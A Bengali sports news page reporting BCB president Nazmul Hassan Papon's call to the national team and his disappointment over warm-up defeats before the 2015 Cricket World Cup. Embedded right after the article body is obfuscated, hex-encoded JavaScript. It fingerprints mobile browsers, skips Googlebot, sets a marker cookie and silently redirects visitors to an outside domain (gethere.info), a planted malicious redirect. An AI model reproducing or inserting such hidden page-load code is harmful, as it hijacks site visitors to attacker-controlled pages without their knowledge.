for Add

দলের খবর নিলেন পাপন

IMG_9726নিজস্ব প্রতিবেদক : বাংলাদেশের আকাশে সূর্য উঠার আগেই আগামীকাল শনিবার শুরু হয়ে যাবে অস্ট্রেলিয়া বিশ্বকাপ ২০১৫। বাংলাদেশে দলের খেলা আগামী ১৮ ফেব্রুয়ারী, প্রথম প্রাতিপক্ষ আফগানিস্তান। তার আগেই আজ শুক্রবার বিকালে দলের কোচ হাতুরা সিংহে এবং ম্যানেজার খালেদ মাহমুদ সুজনের সঙ্গে ফোনে কথা বলে খবরা-খবর নিয়েছেন বাংলাদেশ ক্রিকেট বোর্ড সভাপতি নাজমুল হাসান পাপন। পাশাপাশি দলকে উৎসাহিত করেন; অতীত ব্যর্থতা মুছে ফেলে দেশ প্রেম নিয়ে মূল লড়াইয়ের জন্য নতুন করে প্রস্তুত হওয়ার তাগিদ দেন।

তার আগে সকালে বিওএ ভবন মিলনায়তনে দৈনিক অন লাইন পত্রিকা ‘দি ডেইলি স্পোর্টস২৪ ডটকমে’র আনুষ্ঠানিক উদ্বোধনের পর বোর্ড সভাপতি দল নিয়ে কথা বলতে হতাশা ব্যক্ত করেছেন। তবে মূল লড়াইয়ের আগে এখন দরকার মনোবল বাড়ানোর। তাই ক্রিকেটারদের মানসিক ভাবে চাঙ্গা করতেই তিনি রোববার অস্ট্রেলিয়ার উদ্দেশ্যে ঢাকা ত্যাগ করবেন। সেখানে তিনি ক্রিকেটারদের পরামর্শ দিবেন এবং সামনের ম্যাচগুলোর প্রতি মনোযোগী হতে পরামর্শ দিবেন বলে অভিমত ব্যক্ত করেন।

বাংলাদেশ বিশ্বকাপে অংশ নিতে প্রায় একমাস আগে দেশ ত্যাগ করেছিলো। সেখানে চারটি প্রস্তুতি ম্যাচেও অংশ নেয় বাংলাদেশ ক্রিকেট দল। কিন্তু প্রতিটি ম্যাচেই বাংলাদেশ পরাজিত হয়। মূল লড়াইয়ের আগে তাই কিছুটা হলেও মানসিক ভাবে ভেঙ্গে পড়েছে বাংলাদেশ দল। সর্বশেষ আয়ারল্যান্ডের কাছে বাংলাদেশের পরাজয় ছিলো হতাশা জনক। এবারের বিশ্বকাপে যা কিনা অসনি সংকেত হিসাবে দেখছেন দেশের ক্রিকেট ভক্তরা।

পাপন নিজেও ছিলেন বেশ হতাশ, ‘বৃহস্পতিবার দল হারের পর মনটা ভীষণ খারাপ হয়ে আছে। সাকিবের মতো বিশ্বসেরা অল রাউন্ডার এবং তামিম ও মুশফিকরা রান পাচ্ছে না। আমাকে বিশ্বাস করতেই কষ্ট হচ্ছে। মনে করেছিলাম আয়ারল্যান্ডের সঙ্গে আমরা জিতবো; কিন্তু পারিনি। ম্যাচে হার-জিত থাকবেই কিন্তু এই হারটা সত্যি ছিলো দু:ক্ষ জনক। আমাদের পারফরম্যান্স ভালো হচ্ছে না। আশা করছি সবকিছু ঠিক হয়ে যাবে।’

অস্ট্রেলিয়ান কন্ডিশন সম্পর্কে পাপন বলেন,‘ আমরা জানি এমন কন্ডিশনে খেলতে গেলে আড়াইশত রানের উপরে করা দরকার। ২৮০ রানের নীচে স্কোর করলে কোন লাভ নেই। এতে জেতা সম্ভব না। কারন সব ম্যাচেই বড় স্কোর হচ্ছে। অথচ দূর্বল আয়ারল্যান্ডের বিপক্ষে আমরা দুইশত রানও করতে পারিনি। অবশ্য ওই ম্যাচে আমাদের ইনফর্ম ব্যাটসম্যান মাহমুদ উল্লাহ রিয়াদকে নামেনি। হয়ত পরীক্ষা-নিরীক্ষা করা হয়েছে, পজিশন চেঞ্জ করে খেলানো হয়েছে। এটার একটা ইনপ্যাক্ট পড়তে পারে। আমার দৃঢ় বিশ্বাস বাংলাদেশ মূল ম্যাচে ঘুরে দাঁড়াবে। ঘুরে না দাঁড়ানোর কোনো কারণ আমি দেখি না। এখন আমাদের সামনের যে ম্যাচগুলো আছে তা নিয়ে আমরা হার-জিতে চিন্তিত নই। আমাদেরকে ভাল ক্রিকেট খেলতে হবে। আমরা চাই বাংলাদেশ ভাল খেলুক। আমাদের দলেরও সে সক্ষমতা আছে। এখন বিশ্বকাপে যেন তারা তাদের সক্ষমতা প্রর্দশন করতে পারে এ প্রত্যাশা করছি।’

মূল লড়াইয়ের প্রথম প্রতিপক্ষ স্কটল্যান্ড সম্পর্কে পাপন বলেন,‘ ওই কন্ডিশনে আফগানিস্তান এবং স্কটল্যান্ড আমাদের চেয়ে অনেক ভালো দল। এতে কোন সন্দেহ নেই। স্কটল্যান্ডকে অনেক বড় ব্যবধানে হারিয়েছে। আবার ওয়েস্ট ইন্ডিজের সঙ্গে ৩১৩ রানের জবাবে ৩১০ রান করেছে। আমাদের সমস্যা আমাদের ব্যাটিং লাইন। ভালো স্কোর গড়তে হলে ব্যাটিংয়ে আমাদের কেবল এক,দুইজনকে ভালো করলে চলবে না। এর জন্য একাধিক খেলোয়াড়কে ভালো খেলতে হবে। দলের সিনিয়র ক্রিকেটারদের রান করতে হবে। আড়াইশত রানের উপরে না গেলে এটা কোন প্রতিদ্বন্ধিতাপূর্ন ক্রিকেট হতে পারে না। তাদের দূর্বল ভাবার কোন কারন নেই। ওই কন্ডিশনে স্কটল্যান্ড খুবই শক্তিশালী দল। তাই ওই কন্ডিশনে যত দ্রুত খাপ খাইয়ে নেয়া যায় ততই ভালো। দলের প্রস্তুতি সন্তোষ জনক। এখন একটু মনোবলের দরকার।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

রিয়াজুলকে সভাপতি ও গিয়াসকে সম্পাদক করে বরিশাল স্পোর্টিং ক্লাব গঠিত নারায়ণগঞ্জে নয়ানগর ইউনাইটেড চ্যাম্পিয়ন ঘটনাবহুল বছরে ব্যক্তিগত সাফল্য থাকলেও দলগত পারফরম্যান্স হতাশাজনক বাফুফেতে ফিরছেন সেই ছোটন কল্যান্দীতে সালমা স্মৃতি ফুটবল টুর্নামেন্ট শুরু আইপিএলের দশ দলের পূর্ণাঙ্গ স্কোয়াড : নেই কোন বাংলাদেশী ক্রিকেটার জলসিঁড়ি রানবাংলা হাফ ম্যারাথন ৩০ নভেম্বর আইপিএলের ইতিহাসে রেকর্ড দামে বিক্রি পান্ত লাল-সবুজ জার্সিতে অনিশ্চিত হামজা চ্যালেঞ্জ কাপ জিতে আরেকটি ইতিহাস কিংসের ঢাকায় আয়ারল্যান্ড নারী ক্রিকেট দল ১৮ বছর পর এবার পঞ্চপাণ্ডব ছাড়া টিম বাংলাদেশ বিসিবি ঘোষিত পুরস্কারের অর্থ বুঝে পেলেন সাবিনারা জাকারিয়া পিন্টুকে শেষ বিদায় জানালো ক্রীড়াঙ্গন চলে গেলেন স্বাধীন বাংলা ফুটবল দলের অধিনায়ক শেষ মুহূর্তে রুদ্ধশ্বাস জয় বিদায়ের আগ মুহূর্তে আবেগঘন পোস্ট কায়েসের গোল মিসের মহড়ায় মালদ্বীপের কাছে হার জানুয়ারিতে ঢাকায় আসছেন ফিফা প্রেসিডেন্ট বগুড়ায় জিয়া ক্রিকেট টুর্নামেন্ট শুরু সাবিনাদের জন্য দেড় কোটি টাকা পুরস্কার ঘোষণা বাফুফের ৮ গোল করে নতুন রেকর্ড চেলসির ট্রাম্পকে অভিনন্দন জানালেন ফিফা সভাপতি তাসমেরী স্কুল হ্যান্ডবল টুর্নামেন্ট শুরু ম্যাচের মাঝেই বজ্রপাত > এক ফুটবলারের মৃত্যু তাসমেরী স্কুল হ্যান্ডবল টুর্নামেন্ট আজ শুরু দাবিগুলো পূরণ করার চেষ্টা করব : প্রধান উপদেষ্টা আফগানিস্তান সিরিজে শান্তই অধিনায়ক শনিবার যমুনায় সংবর্ধনা দেবেন প্রধান উপদেষ্টা একনজরে বিপিএলের দলগুলো সাকিবের দেশে আসা-যাওয়ায় কোন বাধা নেই : ক্রীড়া উপদেষ্টা জেনে নিন বাফুফে নির্বাচনে কে কোন পদে… ফুটবলপ্রিয় বন্ধুকে নিয়ে স্মরণ সভা ‘দিন যত যাচ্ছে ততই নির্বাচনের জন্য চাপ বাড়ছে’ নতুন লক্ষ্য নিয়ে ভারতের বিপক্ষে টি-টোয়েন্টি সিরিজ শুরু করবে বাংলাদেশ আদালতের নতুন রায়ে ‘দুঃস্বপ্ন ভাঙলো’ পগবার স্কটল্যান্ডকে হারিয়ে ১০ বছর পর টি-টোয়েন্টি বিশ্বকাপে জয় পেল বাংলাদেশ রেকর্ড গড়ে বাংলাদেশকে হারালো ভারত নয় বছর পর বাংলাদেশে আসছে দক্ষিণ আফ্রিকা সাকিবকে নিরাপত্তা দেওয়া নিয়ে যা বললেন ক্রীড়া উপদেষ্টা এক পদে দুই মেয়াদের বেশি না থাকার নির্দেশনা ক্রীড়া উপদেষ্টার ক্রিকেটের দুই ফরম্যাট থেকে অবসরের ঘোষণা সাকিবের হামলার হুমকির পর কানপুর টেস্ট শুনছে মেঘের গর্জন বাংলাদেশের জার্সিতে খেললে ইংল্যান্ডের কোনো আপত্তি নেই জ্যোতিদের লক্ষ্য বিশ্বকাপ সেমিফাইনাল বাফুফে নির্বাচনে সভাপতি পদে লড়বেন তাবিথ আউয়াল ভারতের কাছে হারলো বাংলাদেশ সিরিয়ার কাছে ৪ গোলে হারলো বাংলাদেশ শেষ মুহূর্তে ভারতের কাছে হার ফিফা র‍্যাংকিং আরো পেছাল বাংলাদেশ

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add